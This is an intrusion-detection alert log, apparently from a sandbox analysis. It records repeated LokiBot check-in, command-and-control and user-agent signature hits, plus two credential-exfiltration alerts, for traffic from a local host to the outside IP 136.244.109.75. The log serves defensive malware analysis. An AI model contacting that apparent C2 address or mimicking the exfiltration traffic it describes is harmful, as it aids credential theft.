04/17/24-03:18:13.442138	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49767	80	192.168.2.5	136.244.109.75
04/17/24-03:18:20.835118	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49772	80	192.168.2.5	136.244.109.75
04/17/24-03:18:47.882152	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49790	80	192.168.2.5	136.244.109.75
04/17/24-03:18:20.835118	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49772	80	192.168.2.5	136.244.109.75
04/17/24-03:17:14.663282	TCP	2025381	ET TROJAN LokiBot Checkin	49727	80	192.168.2.5	136.244.109.75
04/17/24-03:17:20.757055	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.5	136.244.109.75
04/17/24-03:17:41.291392	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.5	136.244.109.75
04/17/24-03:17:41.291392	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.5	136.244.109.75
04/17/24-03:18:13.442138	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49767	80	192.168.2.5	136.244.109.75
04/17/24-03:18:11.616140	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.5	136.244.109.75
04/17/24-03:16:55.317148	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49708	80	192.168.2.5	136.244.109.75
04/17/24-03:16:55.317148	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49708	80	192.168.2.5	136.244.109.75
04/17/24-03:17:34.754471	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.5	136.244.109.75
04/17/24-03:18:34.395592	TCP	2025381	ET TROJAN LokiBot Checkin	49781	80	192.168.2.5	136.244.109.75
04/17/24-03:18:41.923839	TCP	2025381	ET TROJAN LokiBot Checkin	49786	80	192.168.2.5	136.244.109.75
04/17/24-03:18:53.924913	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49794	80	192.168.2.5	136.244.109.75
04/17/24-03:17:10.136681	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49724	80	192.168.2.5	136.244.109.75
04/17/24-03:17:28.661125	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49736	80	192.168.2.5	136.244.109.75
04/17/24-03:17:30.128575	TCP	2025381	ET TROJAN LokiBot Checkin	49737	80	192.168.2.5	136.244.109.75
04/17/24-03:16:58.235959	TCP	2025381	ET TROJAN LokiBot Checkin	49710	80	192.168.2.5	136.244.109.75
04/17/24-03:18:40.424546	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49785	80	192.168.2.5	136.244.109.75
04/17/24-03:17:54.967221	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49754	80	192.168.2.5	136.244.109.75
04/17/24-03:17:59.618244	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.5	136.244.109.75
04/17/24-03:18:40.424546	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49785	80	192.168.2.5	136.244.109.75
04/17/24-03:18:31.393355	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49779	80	192.168.2.5	136.244.109.75
04/17/24-03:18:04.154071	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49760	80	192.168.2.5	136.244.109.75
04/17/24-03:17:59.618244	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49757	80	192.168.2.5	136.244.109.75
04/17/24-03:17:50.302449	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49751	80	192.168.2.5	136.244.109.75
04/17/24-03:18:31.393355	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49779	80	192.168.2.5	136.244.109.75
04/17/24-03:17:54.967221	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49754	80	192.168.2.5	136.244.109.75
04/17/24-03:18:10.084965	TCP	2025381	ET TROJAN LokiBot Checkin	49765	80	192.168.2.5	136.244.109.75
04/17/24-03:18:04.154071	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49760	80	192.168.2.5	136.244.109.75
04/17/24-03:18:19.349314	TCP	2025381	ET TROJAN LokiBot Checkin	49771	80	192.168.2.5	136.244.109.75
04/17/24-03:17:10.136681	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49724	80	192.168.2.5	136.244.109.75
04/17/24-03:17:51.797146	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49752	80	192.168.2.5	136.244.109.75
04/17/24-03:18:43.385034	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49787	80	192.168.2.5	136.244.109.75
04/17/24-03:17:44.338890	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49746	80	192.168.2.5	136.244.109.75
04/17/24-03:18:01.176692	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49758	80	192.168.2.5	136.244.109.75
04/17/24-03:18:22.368817	TCP	2025381	ET TROJAN LokiBot Checkin	49773	80	192.168.2.5	136.244.109.75
04/17/24-03:17:17.652364	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49729	80	192.168.2.5	136.244.109.75
04/17/24-03:17:51.797146	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49752	80	192.168.2.5	136.244.109.75
04/17/24-03:17:08.603347	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49723	80	192.168.2.5	136.244.109.75
04/17/24-03:16:59.708947	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49711	80	192.168.2.5	136.244.109.75
04/17/24-03:17:22.632421	TCP	2025381	ET TROJAN LokiBot Checkin	49732	80	192.168.2.5	136.244.109.75
04/17/24-03:17:17.652364	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49729	80	192.168.2.5	136.244.109.75
04/17/24-03:17:16.164912	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49728	80	192.168.2.5	136.244.109.75
04/17/24-03:17:39.820705	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.5	136.244.109.75
04/17/24-03:18:35.861538	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49782	80	192.168.2.5	136.244.109.75
04/17/24-03:16:53.759072	TCP	2025381	ET TROJAN LokiBot Checkin	49707	80	192.168.2.5	136.244.109.75
04/17/24-03:18:29.847908	TCP	2025381	ET TROJAN LokiBot Checkin	49778	80	192.168.2.5	136.244.109.75
04/17/24-03:18:52.381113	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49793	80	192.168.2.5	136.244.109.75
04/17/24-03:16:59.708947	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49711	80	192.168.2.5	136.244.109.75
04/17/24-03:18:08.625526	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49764	80	192.168.2.5	136.244.109.75
04/17/24-03:18:35.861538	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49782	80	192.168.2.5	136.244.109.75
04/17/24-03:17:44.338890	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49746	80	192.168.2.5	136.244.109.75
04/17/24-03:17:45.817567	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.5	136.244.109.75
04/17/24-03:18:16.378463	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49769	80	192.168.2.5	136.244.109.75
04/17/24-03:18:43.385034	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49787	80	192.168.2.5	136.244.109.75
04/17/24-03:18:52.381113	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49793	80	192.168.2.5	136.244.109.75
04/17/24-03:17:59.618244	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.5	136.244.109.75
04/17/24-03:18:14.912121	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49768	80	192.168.2.5	136.244.109.75
04/17/24-03:17:02.984312	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49713	80	192.168.2.5	136.244.109.75
04/17/24-03:18:19.349314	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49771	80	192.168.2.5	136.244.109.75
04/17/24-03:18:07.152097	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.5	136.244.109.75
04/17/24-03:18:28.314689	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49777	80	192.168.2.5	136.244.109.75
04/17/24-03:18:04.154071	TCP	2025381	ET TROJAN LokiBot Checkin	49760	80	192.168.2.5	136.244.109.75
04/17/24-03:18:46.390927	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49789	80	192.168.2.5	136.244.109.75
04/17/24-03:18:50.868001	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49792	80	192.168.2.5	136.244.109.75
04/17/24-03:18:53.924913	TCP	2025381	ET TROJAN LokiBot Checkin	49794	80	192.168.2.5	136.244.109.75
04/17/24-03:18:46.390927	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49789	80	192.168.2.5	136.244.109.75
04/17/24-03:17:02.984312	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49713	80	192.168.2.5	136.244.109.75
04/17/24-03:18:02.659962	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49759	80	192.168.2.5	136.244.109.75
04/17/24-03:17:17.652364	TCP	2025381	ET TROJAN LokiBot Checkin	49729	80	192.168.2.5	136.244.109.75
04/17/24-03:18:40.424546	TCP	2025381	ET TROJAN LokiBot Checkin	49785	80	192.168.2.5	136.244.109.75
04/17/24-03:18:23.842884	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49774	80	192.168.2.5	136.244.109.75
04/17/24-03:18:37.366005	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49783	80	192.168.2.5	136.244.109.75
04/17/24-03:18:32.922641	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49780	80	192.168.2.5	136.244.109.75
04/17/24-03:18:50.868001	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49792	80	192.168.2.5	136.244.109.75
04/17/24-03:18:23.842884	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.5	136.244.109.75
04/17/24-03:18:37.366005	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49783	80	192.168.2.5	136.244.109.75
04/17/24-03:17:31.711088	TCP	2025381	ET TROJAN LokiBot Checkin	49738	80	192.168.2.5	136.244.109.75
04/17/24-03:17:36.230211	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.5	136.244.109.75
04/17/24-03:17:56.686682	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49755	80	192.168.2.5	136.244.109.75
04/17/24-03:18:26.814059	TCP	2025381	ET TROJAN LokiBot Checkin	49776	80	192.168.2.5	136.244.109.75
04/17/24-03:17:22.632421	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49732	80	192.168.2.5	136.244.109.75
04/17/24-03:17:47.288202	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49749	80	192.168.2.5	136.244.109.75
04/17/24-03:18:47.882152	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49790	80	192.168.2.5	136.244.109.75
04/17/24-03:18:22.368817	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49773	80	192.168.2.5	136.244.109.75
04/17/24-03:18:22.368817	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.5	136.244.109.75
04/17/24-03:16:55.317148	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49708	80	192.168.2.5	136.244.109.75
04/17/24-03:17:04.956657	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49714	80	192.168.2.5	136.244.109.75
04/17/24-03:18:05.666467	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.5	136.244.109.75
04/17/24-03:17:25.655732	TCP	2025381	ET TROJAN LokiBot Checkin	49734	80	192.168.2.5	136.244.109.75
04/17/24-03:17:39.820705	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.5	136.244.109.75
04/17/24-03:17:22.632421	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49732	80	192.168.2.5	136.244.109.75
04/17/24-03:17:56.686682	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49755	80	192.168.2.5	136.244.109.75
04/17/24-03:17:04.956657	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49714	80	192.168.2.5	136.244.109.75
04/17/24-03:18:25.351055	TCP	2025381	ET TROJAN LokiBot Checkin	49775	80	192.168.2.5	136.244.109.75
04/17/24-03:18:29.847908	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49778	80	192.168.2.5	136.244.109.75
04/17/24-03:17:11.695407	TCP	2025381	ET TROJAN LokiBot Checkin	49725	80	192.168.2.5	136.244.109.75
04/17/24-03:17:16.164912	TCP	2025381	ET TROJAN LokiBot Checkin	49728	80	192.168.2.5	136.244.109.75
04/17/24-03:17:28.661125	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49736	80	192.168.2.5	136.244.109.75
04/17/24-03:17:37.986053	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.5	136.244.109.75
04/17/24-03:17:28.661125	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49736	80	192.168.2.5	136.244.109.75
04/17/24-03:17:19.154295	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49730	80	192.168.2.5	136.244.109.75
04/17/24-03:17:42.872387	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.5	136.244.109.75
04/17/24-03:17:33.230598	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49739	80	192.168.2.5	136.244.109.75
04/17/24-03:17:33.230598	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49739	80	192.168.2.5	136.244.109.75
04/17/24-03:17:48.803719	TCP	2025381	ET TROJAN LokiBot Checkin	49750	80	192.168.2.5	136.244.109.75
04/17/24-03:17:14.663282	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49727	80	192.168.2.5	136.244.109.75
04/17/24-03:17:42.872387	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.5	136.244.109.75
04/17/24-03:17:10.136681	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49724	80	192.168.2.5	136.244.109.75
04/17/24-03:17:37.986053	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49742	80	192.168.2.5	136.244.109.75
04/17/24-03:17:50.302449	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49751	80	192.168.2.5	136.244.109.75
04/17/24-03:16:52.374211	TCP	2025381	ET TROJAN LokiBot Checkin	49706	80	192.168.2.5	136.244.109.75
04/17/24-03:17:24.136611	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49733	80	192.168.2.5	136.244.109.75
04/17/24-03:17:50.302449	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49751	80	192.168.2.5	136.244.109.75
04/17/24-03:17:53.372679	TCP	2025381	ET TROJAN LokiBot Checkin	49753	80	192.168.2.5	136.244.109.75
04/17/24-03:18:01.176692	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49758	80	192.168.2.5	136.244.109.75
04/17/24-03:17:08.603347	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49723	80	192.168.2.5	136.244.109.75
04/17/24-03:17:51.797146	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49752	80	192.168.2.5	136.244.109.75
04/17/24-03:18:43.385034	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49787	80	192.168.2.5	136.244.109.75
04/17/24-03:17:41.291392	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.5	136.244.109.75
04/17/24-03:18:01.176692	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49758	80	192.168.2.5	136.244.109.75
04/17/24-03:18:08.625526	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49764	80	192.168.2.5	136.244.109.75
04/17/24-03:18:17.867642	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49770	80	192.168.2.5	136.244.109.75
04/17/24-03:18:20.835118	TCP	2025381	ET TROJAN LokiBot Checkin	49772	80	192.168.2.5	136.244.109.75
04/17/24-03:18:52.381113	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49793	80	192.168.2.5	136.244.109.75
04/17/24-03:16:59.708947	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49711	80	192.168.2.5	136.244.109.75
04/17/24-03:17:20.757055	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.5	136.244.109.75
04/17/24-03:16:50.877994	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49705	80	192.168.2.5	136.244.109.75
04/17/24-03:17:08.603347	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49723	80	192.168.2.5	136.244.109.75
04/17/24-03:18:17.867642	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49770	80	192.168.2.5	136.244.109.75
04/17/24-03:17:44.338890	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49746	80	192.168.2.5	136.244.109.75
04/17/24-03:18:08.625526	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49764	80	192.168.2.5	136.244.109.75
04/17/24-03:18:11.616140	TCP	2025381	ET TROJAN LokiBot Checkin	49766	80	192.168.2.5	136.244.109.75
04/17/24-03:17:54.967221	TCP	2025381	ET TROJAN LokiBot Checkin	49754	80	192.168.2.5	136.244.109.75
04/17/24-03:16:53.759072	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49707	80	192.168.2.5	136.244.109.75
04/17/24-03:16:58.235959	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49710	80	192.168.2.5	136.244.109.75
04/17/24-03:18:19.349314	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49771	80	192.168.2.5	136.244.109.75
04/17/24-03:18:14.912121	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49768	80	192.168.2.5	136.244.109.75
04/17/24-03:16:55.317148	TCP	2025381	ET TROJAN LokiBot Checkin	49708	80	192.168.2.5	136.244.109.75
04/17/24-03:18:19.349314	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49771	80	192.168.2.5	136.244.109.75
04/17/24-03:17:11.695407	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49725	80	192.168.2.5	136.244.109.75
04/17/24-03:18:41.923839	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49786	80	192.168.2.5	136.244.109.75
04/17/24-03:17:28.661125	TCP	2025381	ET TROJAN LokiBot Checkin	49736	80	192.168.2.5	136.244.109.75
04/17/24-03:17:48.803719	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49750	80	192.168.2.5	136.244.109.75
04/17/24-03:16:53.759072	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49707	80	192.168.2.5	136.244.109.75
04/17/24-03:17:11.695407	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49725	80	192.168.2.5	136.244.109.75
04/17/24-03:17:53.372679	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49753	80	192.168.2.5	136.244.109.75
04/17/24-03:18:41.923839	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49786	80	192.168.2.5	136.244.109.75
04/17/24-03:17:53.372679	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49753	80	192.168.2.5	136.244.109.75
04/17/24-03:17:13.162928	TCP	2025381	ET TROJAN LokiBot Checkin	49726	80	192.168.2.5	136.244.109.75
04/17/24-03:18:37.366005	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49783	80	192.168.2.5	136.244.109.75
04/17/24-03:18:31.393355	TCP	2025381	ET TROJAN LokiBot Checkin	49779	80	192.168.2.5	136.244.109.75
04/17/24-03:18:10.084965	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49765	80	192.168.2.5	136.244.109.75
04/17/24-03:16:58.235959	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49710	80	192.168.2.5	136.244.109.75
04/17/24-03:18:14.912121	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49768	80	192.168.2.5	136.244.109.75
04/17/24-03:17:56.686682	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.5	136.244.109.75
04/17/24-03:18:29.847908	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49778	80	192.168.2.5	136.244.109.75
04/17/24-03:17:39.820705	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.5	136.244.109.75
04/17/24-03:17:22.632421	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49732	80	192.168.2.5	136.244.109.75
04/17/24-03:18:35.861538	TCP	2025381	ET TROJAN LokiBot Checkin	49782	80	192.168.2.5	136.244.109.75
04/17/24-03:18:43.385034	TCP	2025381	ET TROJAN LokiBot Checkin	49787	80	192.168.2.5	136.244.109.75
04/17/24-03:18:08.625526	TCP	2025381	ET TROJAN LokiBot Checkin	49764	80	192.168.2.5	136.244.109.75
04/17/24-03:18:22.368817	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.5	136.244.109.75
04/17/24-03:17:44.338890	TCP	2025381	ET TROJAN LokiBot Checkin	49746	80	192.168.2.5	136.244.109.75
04/17/24-03:16:59.708947	TCP	2025381	ET TROJAN LokiBot Checkin	49711	80	192.168.2.5	136.244.109.75
04/17/24-03:17:39.820705	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.5	136.244.109.75
04/17/24-03:18:16.378463	TCP	2025381	ET TROJAN LokiBot Checkin	49769	80	192.168.2.5	136.244.109.75
04/17/24-03:18:05.666467	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49761	80	192.168.2.5	136.244.109.75
04/17/24-03:17:04.956657	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49714	80	192.168.2.5	136.244.109.75
04/17/24-03:17:07.139176	TCP	2025381	ET TROJAN LokiBot Checkin	49716	80	192.168.2.5	136.244.109.75
04/17/24-03:17:30.128575	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49737	80	192.168.2.5	136.244.109.75
04/17/24-03:18:05.666467	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.5	136.244.109.75
04/17/24-03:18:29.847908	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49778	80	192.168.2.5	136.244.109.75
04/17/24-03:17:19.154295	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49730	80	192.168.2.5	136.244.109.75
04/17/24-03:18:46.390927	TCP	2025381	ET TROJAN LokiBot Checkin	49789	80	192.168.2.5	136.244.109.75
04/17/24-03:17:33.230598	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49739	80	192.168.2.5	136.244.109.75
04/17/24-03:18:49.380266	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49791	80	192.168.2.5	136.244.109.75
04/17/24-03:17:24.136611	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49733	80	192.168.2.5	136.244.109.75
04/17/24-03:17:19.154295	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49730	80	192.168.2.5	136.244.109.75
04/17/24-03:17:42.872387	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.5	136.244.109.75
04/17/24-03:17:02.984312	TCP	2025381	ET TROJAN LokiBot Checkin	49713	80	192.168.2.5	136.244.109.75
04/17/24-03:17:45.817567	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49748	80	192.168.2.5	136.244.109.75
04/17/24-03:17:45.817567	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49748	80	192.168.2.5	136.244.109.75
04/17/24-03:18:49.380266	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49791	80	192.168.2.5	136.244.109.75
04/17/24-03:18:50.868001	TCP	2025381	ET TROJAN LokiBot Checkin	49792	80	192.168.2.5	136.244.109.75
04/17/24-03:17:01.257517	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49712	80	192.168.2.5	136.244.109.75
04/17/24-03:18:07.152097	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.5	136.244.109.75
04/17/24-03:16:52.374211	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49706	80	192.168.2.5	136.244.109.75
04/17/24-03:18:44.899678	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49788	80	192.168.2.5	136.244.109.75
04/17/24-03:17:58.145128	TCP	2025381	ET TROJAN LokiBot Checkin	49756	80	192.168.2.5	136.244.109.75
04/17/24-03:17:14.663282	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49727	80	192.168.2.5	136.244.109.75
04/17/24-03:17:37.986053	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.5	136.244.109.75
04/17/24-03:17:24.136611	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49733	80	192.168.2.5	136.244.109.75
04/17/24-03:16:56.772780	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49709	80	192.168.2.5	136.244.109.75
04/17/24-03:17:14.663282	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49727	80	192.168.2.5	136.244.109.75
04/17/24-03:18:34.395592	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49781	80	192.168.2.5	136.244.109.75
04/17/24-03:18:13.442138	TCP	2025381	ET TROJAN LokiBot Checkin	49767	80	192.168.2.5	136.244.109.75
04/17/24-03:18:25.351055	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49775	80	192.168.2.5	136.244.109.75
04/17/24-03:17:34.754471	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.5	136.244.109.75
04/17/24-03:18:02.659962	TCP	2025381	ET TROJAN LokiBot Checkin	49759	80	192.168.2.5	136.244.109.75
04/17/24-03:17:27.158635	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49735	80	192.168.2.5	136.244.109.75
04/17/24-03:18:26.814059	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49776	80	192.168.2.5	136.244.109.75
04/17/24-03:16:50.877994	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49705	80	192.168.2.5	136.244.109.75
04/17/24-03:18:17.867642	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49770	80	192.168.2.5	136.244.109.75
04/17/24-03:18:26.814059	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49776	80	192.168.2.5	136.244.109.75
04/17/24-03:17:36.230211	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49741	80	192.168.2.5	136.244.109.75
04/17/24-03:17:27.158635	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49735	80	192.168.2.5	136.244.109.75
04/17/24-03:18:38.899573	TCP	2025381	ET TROJAN LokiBot Checkin	49784	80	192.168.2.5	136.244.109.75
04/17/24-03:17:36.230211	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49741	80	192.168.2.5	136.244.109.75
04/17/24-03:17:25.655732	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49734	80	192.168.2.5	136.244.109.75
04/17/24-03:16:50.877994	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49705	80	192.168.2.5	136.244.109.75
04/17/24-03:18:47.882152	TCP	2025381	ET TROJAN LokiBot Checkin	49790	80	192.168.2.5	136.244.109.75
04/17/24-03:18:10.084965	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49765	80	192.168.2.5	136.244.109.75
04/17/24-03:16:58.235959	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49710	80	192.168.2.5	136.244.109.75
